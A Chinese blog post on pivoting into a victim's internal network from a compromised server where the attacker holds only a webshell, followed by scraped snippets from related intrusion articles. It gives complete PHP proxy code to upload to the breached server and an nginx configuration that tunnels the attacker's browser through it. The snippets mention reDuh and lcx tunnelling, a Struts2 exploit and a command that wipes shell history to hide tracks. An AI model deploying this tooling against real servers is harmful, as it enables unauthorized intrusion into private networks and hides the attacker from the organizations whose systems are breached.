用Webshell直接杀入内网

有时候要代理进内网,但是服务器没有外网端口,也没法执行命令反弹lcx什么的,也没有提权什么什么的,只有一个webshell,这个时候就比较蛋疼了。
鄙人不才,写了一个比较山寨的php+nginx反向代理,可以比较容易的实现这个功能。

架设起来也算是比较方便了。就把这个用webshell也好,上传漏洞也好,甩到对方服务器上。
然后配置一下本地的nginx,做一个反向代理+rewrite就OK。

先看代码
proxy.php

<?php
if(!isset($_GET[‘url‘])){
  exit(0);
}
$ch = curl_init();
$url=$_GET[‘url‘];
if(strstr($url,‘?‘)){
  $url.=‘&‘;
}
else{
  $url.=‘?‘;
}
unset($_GET[‘url‘]);
foreach($_GET as $Key=>$Val){
  if(get_magic_quotes_gpc()){
    $Val=stripslashes($Val);
  }
  $url=$url.‘&‘.$Key.‘=‘.urlencode($Val);
}
$cookie=‘‘;
foreach($_COOKIE as $Key=>$Val){
  if(get_magic_quotes_gpc()){
    $Val=stripslashes($Val);
  }
  $cookie=$cookie.$Key.‘=‘.urlencode($Val).‘; ‘;
}
if($_SERVER[‘REQUEST_METHOD‘]=="POST"){
  curl_setopt($ch, CURLOPT_POST, 1);
  $post_data=‘‘;
  foreach($_POST as $Key=>$Val){
    if(get_magic_quotes_gpc()){
      $Val=stripslashes($Val);
    }
    $post_data=$post_data.‘&‘.$Key.‘=‘.urlencode($Val);
  }
  curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
}
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER[‘HTTP_USER_AGENT‘]);
curl_setopt($ch, CURLOPT_COOKIE, $cookie);
curl_setopt($ch, CURLOPT_HEADER, TRUE);
curl_setopt($ch, CURLOPT_NOBODY, FALSE);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
if(isset($_SERVER[‘HTTP_REFERER‘])){
  curl_setopt($ch, CURLOPT_REFERER, $_SERVER[‘HTTP_REFERER‘]);
}
$Response=curl_exec($ch);
if(!$Response){
  curl_close($ch);
  exit(0);
}
$HttpStatus=curl_getinfo($ch,CURLINFO_HTTP_CODE);
$Header=substr($Response,0,curl_getinfo($ch, CURLINFO_HEADER_SIZE));
$Body=substr($Response,curl_getinfo($ch, CURLINFO_HEADER_SIZE));
$Headers=split("\r\n",$Header);
foreach($Headers as $ThusHead){
  if($ThusHead == ‘Transfer-Encoding: chunked‘ || strstr($ThusHead,‘Content-Length‘)!==false){
    continue;
  }
  header($ThusHead,FALSE);
}
echo $Body;
curl_close($ch);
?>

代码很简单,也有一些简单的小bug,不知各位看官看出来没有,我也懒得去修改了。
另外就是:
1. 这个代理只支持基本的GET/POST并不支持上传文件,有兴趣的可以自己看看,搞搞,搞完发出来,造福大家
2. 这个代理在转发post请求的时候,用的并不是www-url-encode,所以,也许会有的程序识别不正常

然后在本地的nginx里面新加一个配置

# proxy webshell
    server {
        listen          这里写监听端口;
        location ~ () {
                proxy_pass              http://webshell的IP/文件/存放/目录/proxy.php?url=http://$host/$request_uri;
                proxy_set_header        Host    "访问webshell用域名";
        }
    }

然后重新加载一下nginx配置,配置浏览器使用nginx监听的端口做为代理,就可以使了。
给个效果图。

时间: 2024-12-13 18:47:34

用Webshell直接杀入内网的相关文章

内网渗透利器--reDuh(webshell跳板)

作者:sai52[B.H.S.T] 国外大牛的作品,偶顺手写了个使用说明.E文好的看原文  http://www.sensepost.com/research/reDuh/ 这个工具可以把内网服务器的端口通过http/https隧道转发到本机,形成一个连通回路.用于目标服务器在内网或做了端口策略的情况下连接目标服务器内部开放端口. 本机-------客户端---------(http隧道)-----------服务端------------------内网服务器 服务端是个webshell(针对

内网渗透+基础+工具使用=自己理解

目录 1.代理 2.内网命令 3.抓密码 4.ipc$共享目录利用 5.端口漏洞 6.溢出 1.代理 端口转发工具有很多比如:rebind2  eDuh  ssock  reDuh  lcx  socks5 等--.. 下面介绍我比较喜欢的2款工具LCX+ socks5 1.lcx 路由器加端口 TCP协议 ,固定IP地址本机 大马设置 Local Ip : 转发ip Local Port : 转发端口 Remote Ip :本机ip (ip138.com外网ip) Remote Port :

[原创] 一次渗透测试过程--从外网进内网

最近内网权限掉了,  需要重新找外网的入口进内网,用凤凰扫描器生成字典扫了一下弱口令,人肉查看了c段上的一些web, 扫了扫端口,发现13这台机器上跑了一个wingsoft的软件, 在乌云上找到了一个漏洞, 用st2 -005 漏洞获得一个cmdshell 0x02  进入边界服务器 执行 unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG;export HISTFILE=/dev/null;export HISTSIZE=0;exp

内网渗透思路

Sky's自留地 关注互联网安全,关注安全&攻击技术. 搜索关键字搜索 首页申请链接 内网渗透测试思路[转自网络] 作者: sky 孵化于: March 15, 2015 家属: 学习类,技术类 访问: 2,136 次 写在前面渗透测试是门技术,也是一门艺术.这门技术(艺术)一开始也不是每个人都会的,正所谓没有人一出生就会走路,从不懂到入门到深谙,一步步慢慢来,每个人都是这样:但是在这个过程中,思路无疑是最重要的,没有做不到只有想不到,就跟咱们高中解题时有了思路就迎刃而解一样,手里拿着铲子(技巧

Linux渗透+SSH内网转发

http://www.jb51.net/hack/58514.html http://blog.chinaunix.net/uid-756931-id-353243.html http://blog.163.com/czg_e/blog/static/46104561201552423342331?ignoreua http://www.noah.org/wiki/SSH_tunnel http://www.myhack58.com/Article/60/63/2013/38396_3.htm

一次渗透测试过程--从外网进内网(原创)

本文首发习科:地址http://bbs.blackbap.org/thread-7483-1-1.html 最近内网权限掉了, 需要重新找外网的入口进内网, 用凤凰扫描器生成字典扫了一下弱口令,人肉查看了c段上的一些web, 扫了扫端口,发现13这台机器上跑了一个wingsoft的软件, 在乌云上找到了一个漏洞, 用st2 -005 漏洞得到了可以远程执行命令的权限 0x02 进入边界服务器 执行 unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY

记一次内网渗透

信息收集拿到了此公司二级域名 有内网有外网 web不存在明显的重大漏洞,反射的xss flash的csrf 测试页面 phpinfo等这些漏洞还是存在的 但是目地是进内网拿到核心数据. 通过bbs拿到了某管理的QQ 进行社工  社工了印象笔记 里面存有公司的vpn密码,可以登录. 此前已经拿到了内网的域名 访问内网域名,确实全部在vpn登录进去的这个网段 几乎所有解析都指向192.168.1这个网段,存在mongodb未授权访问,但拿不到webshell,还有jboss存在invoker 可以查

从目录信息泄露到渗透内网

simeon 1.目录信息泄露 目录信息泄露是指当当前目录无index.html/index.asp/index.php/index.asp.net等指定主页的情况下,直接显示目录下所有的文件及其目录.测试方法和简单,在网站路径后输入目录名称即可,一般的扫描软件会自动识别该漏洞,如图1所示,显示该网站存在目录漏洞. 图1存在目录泄露漏洞 2.发现后台弱口令 在目录泄露的基础上,发现网站存在后台管理地址,使用弱口令admin/admin顺利登陆该投票管理系统,如图2所示.出现目录泄露漏洞的网站后台

安天实战课题研究2017年第二期内网渗透技术题目

安天实战课题研究2017年第二期内网渗透技术题目拟研究以下题目:1.使用NTScan扫描内网Windows口令(已经完成)2.使用Hscan进行内网口令扫描 (已经完成)3.扫描Mysql口令 (已经完成)4.扫描MSSQL口令 (已经完成)5.使用SQLTools查看SQL Server数据库及提权 (已经完成)6.内网信息收集工具7.内网信息自动收集脚本8.内网密码获取工具9.服务器明文密码及hash获取10.Windows及Linux密码哈希破解11.远程终端使用攻略 (已经完成)12.记